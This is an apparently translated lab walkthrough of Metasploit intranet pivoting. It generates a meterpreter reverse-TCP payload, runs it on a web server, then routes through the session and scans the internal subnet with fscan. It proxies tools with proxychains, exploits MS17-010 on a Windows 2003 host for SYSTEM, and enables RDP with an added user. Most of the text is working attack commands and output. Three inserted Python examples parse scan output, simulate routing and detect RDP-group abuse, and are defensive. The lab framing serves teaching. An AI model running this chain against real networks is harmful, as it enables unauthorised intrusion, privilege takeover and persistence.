MSF intranet pivoting
I. Environment setup
1. Topology diagram (admittedly ugly)
2. Web server configuration
Configure two network adapters: one that talks to the external network and one that talks to the internal network.
3. Windows 2003
It also has two adapters, but once we are inside, the NAT adapter gets disabled,
so it can no longer be reached from the external network.
II. Bringing the web server online in MSF
1. Generate the remote trojan (payload)
If this trojan stops responding during the later remote connection, use frp; if you are not familiar with frp, see the later article on port mapping.
# Generate the Linux trojan
msf6 > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > shell.elf
[*] exec: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > shell.elf
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
# Start an HTTP server so the pivot host can download it
msf6 > python -m http.server 80
[*] exec: python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
2. Download the trojan onto the pivot host
3. Start the listener on Kali
# Start the handler as a background job
msf6 > handler -p linux/x64/meterpreter/reverse_tcp -H 192.168.88.141 -P 4444
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.88.141:4444
# List the background jobs
msf6 > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
4. Bring the pivot host online in MSF
# Grant execute permission
[root@CentOS-2 ~]# chmod +x shell.elf
# List the directory
[root@CentOS-2 ~]# ll
总用量 988
-rw-r--r-- 1 1000 mysql 98740 6月 20 2017 package.xml
drwxr-xr-x 2 1000 mysql 192 10月 24 20:45 rar
-rw-r--r-- 1 root root 610546 10月 24 20:36 rarlinux-6.0.2.tar.gz
-rwxr-xr-x 1 root root 250 11月 7 20:08 shell.elf
drwxr-xr-x 9 root root 4096 10月 23 20:09 xdebug-2.5.5
-rw-r--r-- 1 root root 279491 10月 23 19:39 xdebug-2.5.5.tgz
# Run the trojan in the background
[root@CentOS-2 ~]# ./shell.elf &
# Job number and PID
[1] 4418
III. Intranet pivoting
1. Collect network adapter information
# The reverse shell checks in
msf6 > [*] 192.168.88.132 - Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 2 opened (192.168.88.141:4444 -> 192.168.88.132:48462) at 2023-11-07 20:17:27 +0800
[*] Sending stage (3045348 bytes) to 192.168.88.132
[*] Meterpreter session 3 opened (192.168.88.141:4444 -> 192.168.88.132:48464) at 2023-11-07 20:18:11 +0800
# List sessions
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:48464 (192.168.88.132)
# Interact with the session
msf6 > sessions 3
[*] Starting interaction with 3...
# Check privileges
meterpreter > getuid
Server username: root
# Show adapter information
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:2f:8d:05
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.88.132
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::e9bd:86a7:5c42:bbd7
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : ens35
Hardware MAC : 00:0c:29:2f:8d:0f
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.0.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::fcd3:d4de:75a7:5326
IPv6 Netmask : ffff:ffff:ffff:ffff::
There is an internal address in a class A private range (10.0.0.0/8).
# Show routes
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.88.2 102 ens33
10.0.0.0 255.255.255.0 0.0.0.0 103 ens35
192.168.88.0 255.255.255.0 0.0.0.0 102 ens33
No IPv6 routes were found.
2. Create routes
Traffic for these two subnets will be routed through "Session 3".
# Add routes
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 192.168.88.132
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
meterpreter > bg
[*] Backgrounding session 3...
# Show the session routing table
msf6 > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
10.0.0.0 255.255.255.0 Session 3
192.168.88.0 255.255.255.0 Session 3
[*] There are currently no IPv6 routes defined.
3. MSF's built-in scanners
msf6 > search discovery
The scanners bundled with MSF are a bit hit-and-miss, so they are not used here.
IV. The fscan scanning tool
1. Download and install the tool
- Download: https://github.com/shadow1ng/fscan/releases/tag/1.8.2 (Linux 64-bit build)
2. Upload the tool
# Show the current directory
meterpreter > pwd
/root
# Upload the tool
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
# Drop into a shell
meterpreter > shell
pyProcess 5035 created.
Channel 2 created.
# Use python to spawn a proper bash with a pty
python -c "import pty;pty.spawn('/bin/bash')"
# Rename the binary
[root@CentOS-2 ~]# mv fscan_amd64 fscan
mv fscan_arm64 fscan
# Grant execute permission
[root@CentOS-2 ~]# chmod +x fscan
chmod +x fscan
3. How to use the tool
# Show the help text
[root@CentOS-2 ~]# ./fscan -h
4. Scan the internal hosts
# Scan the subnet
[root@CentOS-2 ~]# ./fscan -h 10.0.0.0/24
./fscan -h 10.0.0.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
# Live hosts, discovered with ICMP
start infoscan
(icmp) Target 10.0.0.2 is alive
(icmp) Target 10.0.0.3 is alive
# Open ports found
[*] Icmp alive hosts len is: 2
10.0.0.3:445 open
10.0.0.3:139 open
10.0.0.3:135 open
10.0.0.3:80 open
10.0.0.2:22 open
10.0.0.3:8000 open
10.0.0.3:3306 open
10.0.0.3:8101 open
10.0.0.3:8100 open
10.0.0.3:8006 open
10.0.0.3:8004 open
10.0.0.3:8003 open
10.0.0.3:8002 open
10.0.0.3:8001 open
10.0.0.3:8300 open
10.0.0.3:8200 open
[*] alive ports len is: 16
HTTP services found by the scan
Weak passwords it brute-forced; the SSH password was not cracked, though.
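The scan output above is easier to reason about as a host inventory than as a flat list of lines. The following parser is an added example, not part of the original post or of fscan itself: it reads the ICMP sweep lines and the "host:port open" lines in the format shown above and groups the results per host, which is the same view a defender would build when reconciling a scan against the assets and firewall rules they expect. The sample text is constructed in the shape of the output above.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the fscan output shown above
# (ICMP sweep lines, then "host:port open" lines).
SAMPLE_OUTPUT = """\
start infoscan
(icmp) Target 10.0.0.2 is alive
(icmp) Target 10.0.0.3 is alive
[*] Icmp alive hosts len is: 2
10.0.0.3:445 open
10.0.0.3:139 open
10.0.0.3:80 open
10.0.0.2:22 open
10.0.0.3:3306 open
[*] alive ports len is: 5
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\d{1,3}(?:\.\d{1,3}){3}) is alive$")
PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) open$")


def parse_fscan(text):
    """Return (alive_hosts, open_ports); open_ports maps host -> sorted list of ports."""
    alive = []
    ports = defaultdict(set)
    for line in text.splitlines():
        line = line.strip()
        m = ALIVE_RE.match(line)
        if m:
            alive.append(m.group(1))
            continue
        m = PORT_RE.match(line)
        if m:
            ports[m.group(1)].add(int(m.group(2)))
    return alive, {host: sorted(p) for host, p in ports.items()}


def hosts_with_ports(text, wanted):
    """Hosts exposing any of the given ports, e.g. SMB ports that policy says should be filtered."""
    _, ports = parse_fscan(text)
    wanted = set(wanted)
    return sorted(host for host, p in ports.items() if wanted & set(p))


def summarize(text):
    """Human-readable per-host summary of the scan."""
    alive, ports = parse_fscan(text)
    lines = [f"{len(alive)} live hosts"]
    for host in alive:
        plist = ", ".join(str(p) for p in ports.get(host, []))
        lines.append(f"{host}: {plist or 'no open ports in scanned range'}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(SAMPLE_OUTPUT))
    print("SMB exposed on:", hosts_with_ports(SAMPLE_OUTPUT, [139, 445]))
```

Running it against the real output pasted above gives the same per-host view; the `hosts_with_ports` check is the one to feed from an allow-list of ports each host is supposed to expose.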
V. Start a proxy into the internal network
1. Use the MSF proxy module
# Exit the shell
[root@CentOS-2 ~]# exit
exit
exit
exit
# Background the session to return to msfconsole
meterpreter > bg
[*] Backgrounding session 1...
# Select the proxy module
msf6 > use auxiliary/server/socks_proxy
# Show the module's options
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
# The proxy listens on port 1080
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
# Start the proxy module
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
# List the background jobs
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
# the handler
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
# the proxy
2. Edit the config file
On my Kali I opened a new terminal window and edited the bottom of the file.
┌──(root㉿kali-3)-[/home/sword]
└─# vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
3. proxychains
Any tool on Kali can be sent into the internal network through the proxy with proxychains.
# Connect to MySQL
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains mysql -uroot -h 10.0.0.3 -p
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Enter password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.3:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 514
Server version: 5.5.53 MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
# List all database names
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| 74cms |
| bbstest |
| challenges |
| cmseasy |
| dorabox |
| dvwa |
| fiyo |
| fiyo78_ |
| fiyocms |
| metinfo |
4. How the proxy path works
- First we created routes inside MSF
- Then we edited the proxychains config file
- And we had uploaded the shell.elf trojan
proxychains sends the data to the local MSF. MSF looks up its own routing table, sees that the traffic is destined for the 10.0 network, and hands it to session 1. Session 1 passes the data to the shell.elf trojan; from the trojan it reaches the web server, which consults its own routing table and forwards it on to Win2003.
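The decision MSF makes in the path above (section III.2's `route print` table, and "MSF looks up its own routing table" here) is ordinary IP routing: the destination is matched against the session routes and the traffic goes to the session behind the matching subnet. The following is an added example, not code from the original post or from Metasploit: it parses a text copy of the `route print` table, mirrors `route add` with a helper, and answers "which session carries traffic to this destination?" The longest-prefix rule used when two routes overlap is an assumption made for the example, not a statement about Metasploit's internal switchboard.

```python
import ipaddress

# Constructed text copy of the "route print" table from section III.2.
ROUTE_PRINT = """\
Subnet        Netmask          Gateway
------        -------          -------
10.0.0.0      255.255.255.0    Session 3
192.168.88.0  255.255.255.0    Session 3
"""


def parse_route_table(text):
    """Parse 'subnet netmask Session N' rows into a list of (network, session_id)."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[2] == "Session":
            # ipaddress accepts "subnet/netmask"; strict=False tolerates host bits.
            net = ipaddress.ip_network(f"{parts[0]}/{parts[1]}", strict=False)
            routes.append((net, int(parts[3])))
    return routes


def add_route(routes, subnet, netmask, session_id):
    """Return a new table with one more entry, like 'route add <subnet> <netmask> <session>'."""
    net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
    return routes + [(net, session_id)]


def pick_session(routes, dest):
    """Session id that would carry traffic to dest, or None if no route matches.

    Assumption for this example: when several routes match, the most specific
    (longest prefix) one wins.
    """
    addr = ipaddress.ip_address(dest)
    best = None
    for net, sid in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sid)
    return best[1] if best else None


def describe_path(routes, dest, proxy="127.0.0.1:1080"):
    """Hop-by-hop description of where a proxychains connection to dest would go."""
    sid = pick_session(routes, dest)
    if sid is None:
        return f"proxychains -> MSF SOCKS {proxy} -> no session route -> direct from Kali"
    return f"proxychains -> MSF SOCKS {proxy} -> Session {sid} -> {dest}"


if __name__ == "__main__":
    table = parse_route_table(ROUTE_PRINT)
    for target in ("10.0.0.3", "192.168.88.150", "8.8.8.8"):
        print(describe_path(table, target))
```

Feeding it the `route print` output from section III.2 shows why a connection to 10.0.0.3:3306 ends up inside the meterpreter session while a connection to an address outside both subnets leaves Kali directly.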
VI. Exploit the vulnerability
1. Search for exploit modules
The fscan scan showed that the Win2003 host has MS17-010 (the EternalBlue vulnerability).
# Exit the shell
[root@CentOS-2 ~]# exit
exit
exit
exit
# Background the session to return to msfconsole
meterpreter > bg
[*] Backgrounding session 1...
# Search for matching modules
msf6 > search MS17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
# exploit module
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
# exploit module
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
# auxiliary (check) module
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
# auxiliary (check) module
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
# exploit module
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
2. Switch exploit module
I already tried number 0; it can only exploit 64-bit systems.
# Select exploit module number 1
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
# Show options
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
# Set the target IP
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
# Switch to a bind (forward-connect) payload
msf6 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
# Run the module
msf6 exploit(windows/smb/ms17_010_psexec) > run
3. Bind connection succeeded
# Check privileges
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# Background the session, keeping it alive
meterpreter > bg
[*] Backgrounding session 3...
# List sessions
msf6 exploit(windows/smb/ms17_010_psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
# the web server's shell
1 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:35048 (192.168.88.132)
# the Windows 2003 shell
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ GOD-111 10.0.0.2:53806 -> 10.0.0.3:4444 via session 1 (10.0.0.3)
VII. Enable Remote Desktop
1. Enable RDP
# Interact with the Win2003 session
msf6 exploit(windows/smb/ms17_010_psexec) > sessions 3
[*] Starting interaction with 3...
# Run the post module that enables the Remote Desktop service
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231108163204_default_10.0.0.3_host.windows.cle_455566.txt
# Drop into a shell
meterpreter > shell
netProcess 464 created.
Channel 2 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
# Create a user (note: the command was echoed back as 'netnet', so this invocation failed; see the error below)
C:\WINDOWS\system32>net user sword sword /add
netnet user sword sword /add
'netnet' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
# Add the user to the Remote Desktop Users group (fails here because the user was never created)
C:\WINDOWS\system32>net localgroup "remote desktop users" sword /add
net localgroup "remote desktop users" sword /add
没有这样的全局用户或组: sword.
请键入 NET HELPMSG 3783 以获得更多的帮助。
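From the defender's side, the two `net` commands above (a local account being created and then added to "Remote Desktop Users" from a shell running as NT AUTHORITY\SYSTEM) leave a clear trail in the Security log. The following detection is an added example, not code from the original post: it runs over a few constructed, simplified key=value event records (not real Windows log lines) and raises an alert when an account is added to the RDP group within a short window of its creation, or when the addition is performed by SYSTEM rather than an interactive administrator. The event IDs are the modern ones, 4720 (user account created) and 4732 (member added to a security-enabled local group); Windows Server 2003, the target in this walkthrough, logs the pre-Vista IDs 624 and 636 for the same actions, so both sets are accepted.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a simplified key=value form (not real Windows log lines).
SAMPLE_EVENTS = [
    "time=2023-11-08T16:33:10 id=4720 subject=SYSTEM target=sword host=GOD-111",
    "time=2023-11-08T16:33:12 id=4732 subject=SYSTEM member=sword group=Remote Desktop Users host=GOD-111",
    "time=2023-11-08T09:00:00 id=4720 subject=admin target=svc_backup host=GOD-111",
    "time=2023-11-08T15:00:00 id=4732 subject=admin member=svc_backup group=Backup Operators host=GOD-111",
    "time=2023-11-08T15:05:00 id=636 subject=admin member=helpdesk group=Remote Desktop Users host=GOD-111",
]

ACCOUNT_CREATED_IDS = {"4720", "624"}      # Vista+ id, Windows 2003 id
LOCAL_GROUP_ADD_IDS = {"4732", "636"}      # Vista+ id, Windows 2003 id
RDP_GROUP = "remote desktop users"

# Values may contain spaces ("Remote Desktop Users"), so a value runs until the next " key=".
KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(KV_RE.findall(line))


def detect_rdp_group_abuse(lines, window=timedelta(minutes=10)):
    """Return (host, account, reason) alerts for suspicious additions to Remote Desktop Users."""
    events = [parse_event(line) for line in lines]

    # Remember when each account was created so a follow-up group add can be correlated.
    created_at = {}
    for ev in events:
        if ev.get("id") in ACCOUNT_CREATED_IDS:
            created_at[ev["target"]] = datetime.fromisoformat(ev["time"])

    alerts = []
    for ev in events:
        if ev.get("id") not in LOCAL_GROUP_ADD_IDS or ev.get("group", "").lower() != RDP_GROUP:
            continue
        when = datetime.fromisoformat(ev["time"])
        member = ev["member"]
        reasons = []
        if member in created_at:
            age = when - created_at[member]
            if timedelta(0) <= age <= window:
                reasons.append(f"account created {int(age.total_seconds())}s before being granted RDP")
        if ev.get("subject", "").upper() == "SYSTEM":
            reasons.append("group change made by SYSTEM rather than an interactive administrator")
        if reasons:
            alerts.append((ev["host"], member, "; ".join(reasons)))
    return alerts


if __name__ == "__main__":
    for host, account, reason in detect_rdp_group_abuse(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: {account} -> Remote Desktop Users ({reason})")
```

The `helpdesk` record shows the intended negative case: an administrator adding an existing account to the RDP group during business hours produces no alert, while the create-then-add pair performed by SYSTEM does. The same module run above also reports that it changes the Terminal Services startup mode and opens the firewall port, so service-configuration and firewall-rule changes on a host that was not scheduled for them are worth correlating with these events.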
2. Connect with Remote Desktop
# Launch the Remote Desktop client through the proxy
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains remmina
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16